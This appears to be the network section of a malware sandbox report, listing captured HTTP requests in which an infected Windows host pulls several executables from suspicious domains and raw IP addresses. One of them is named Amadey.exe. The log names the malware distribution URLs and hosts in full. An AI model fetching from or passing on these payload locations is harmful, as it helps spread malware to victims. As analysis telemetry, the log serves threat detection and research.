Network Analysis

GET /raw/HPj0MzD6 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 505 Last-Modified: Wed, 18 Oct 2023 22:45:30 GMT Server: cloudflare CF-RAY: 81845c358b6bdbcc-LAX

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: flyawayaero.net Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Wed, 18 Oct 2023 22:53:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KeIywejmw%2BloRUjr%2BevwkpIsBfaYlBKrVoHnX7rz%2BeWu5g28rwgKLjXb5jxy8TFSQKuq2LXMAk85%2B%2BDE%2FDrZWHW78TWdRSpnP4MnCh7cVNz3hPwSpzVOl9jhi2DC5olleWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845c374f01e086-NRT alt-svc: h3=":443"; ma=86400

GET /7a54bdb20779c4359694feaa1398dd25.exe HTTP/1.1 Host: grabyourpizza.com Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Wed, 18 Oct 2023 22:53:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HAYkgFaqV5eXiYGFVFnBUtgUuL8pFgdkaJEkahU52ln16uinVAGVRpOHJlCqD0hNK%2BaQF59CBZ3t0xjClJoXmwxQCn0xUcbup4rIw4JqfmsPOTkJfxMYIhbrJhgVJQtaoXMegQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845c378c4c8322-KIX alt-svc: h3=":443"; ma=86400

GET /4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: potatogoose.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:57 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4369264 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 20:34:08 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jID2hNuxEDf75NAViXx90lelaowwJp4p17eatx8Vr3EH5REuh97UauYzGZhMKocFH5V4LktXMOq4MVzTgBbGZyBIiZcAQnwTz4qyvyAKimXfNqr3LMyv3zwfUUKYT%2Bd5XbY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845c3b8c09e0b0-NRT alt-svc: h3=":443"; ma=86400

GET /4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe HTTP/1.1 Host: diplodoka.net Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:57 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4369296 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 20:34:10 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BWYBTWJvSkncQnSAOVUQOyDk%2BPIMldQMtj2DQmmsW49v4%2BzXwY4Cd0UqV%2BKpKrj54I%2BDx%2Fb2Ee1w3LAyRg4fdSBafkkIRLnzfzsOy5CRpS2UI8MEDQ1omhGykCzdiNsM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81845c3bbaad19ec-KIX alt-svc: h3=":443"; ma=86400

GET /himeffectivelyproress.exe HTTP/1.1 Host: 172.86.97.117 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 18 Oct 2023 11:43:05 GMT ETag: "5e000-607fc247c97bc" Accept-Ranges: bytes Content-Length: 385024 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /files/Amadey.exe HTTP/1.1 Host: 85.217.144.143 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:56 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Sun, 01 Oct 2023 10:41:57 GMT ETag: "38800-606a54e8fc226" Accept-Ranges: bytes Content-Length: 231424 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /files/My2.exe HTTP/1.1 Host: 85.217.144.143 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:56 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 12 Oct 2023 02:11:41 GMT ETag: "53d718-6077b75f2e86b" Accept-Ranges: bytes Content-Length: 5494552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /downloads/toolspub1.exe HTTP/1.1 Host: galandskiyher5.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 18 Oct 2023 22:53:56 GMT Content-Type: application/x-msdos-program Content-Length: 268800 Connection: close Last-Modified: Wed, 18 Oct 2023 22:53:02 GMT ETag: "41a00-60805806252d5" Accept-Ranges: bytes

GET /build.exe HTTP/1.1 Host: gons01b.top Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Oct 2023 22:53:56 GMT Content-Type: application/octet-stream Content-Length: 381952 Connection: keep-alive Last-Modified: Wed, 18 Oct 2023 15:56:07 GMT ETag: "5d400-607ffad6b86c2" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 18 Oct 2023 23:53:55 GMT Date: Wed, 18 Oct 2023 22:53:55 GMT Connection: keep-alive

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 18 Oct 2023 22:53:56 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 18 Oct 2023 23:53:56 GMT Date: Wed, 18 Oct 2023 22:53:56 GMT Connection: keep-alive

GET /svp/Ykwrxaauw.dat HTTP/1.1 Host: 104.194.128.170 Connection: Keep-Alive

GET /IE9CompatViewList.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: ie9cvlist.ie.microsoft.com If-Modified-Since: Fri, 16 Oct 2020 17:54:09 GMT If-None-Match: 0x8D871FC7BDF491D Connection: Keep-Alive

HTTP/1.1 200 OK Content-Encoding: gzip Age: 20736 Cache-Control: max-age=21600 Content-MD5: p9g4jsuZO6TaLMVAI9ujVg== Content-Type: text/xml Date: Wed, 18 Oct 2023 22:55:19 GMT Etag: 0x8D9521D2D2DF1EC Last-Modified: Wed, 28 Jul 2021 23:12:31 GMT Server: ECAcc (tka/897A) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 788bd352-c01e-0078-4ae5-0185b5000000 x-ms-version: 2009-09-19 Content-Length: 13702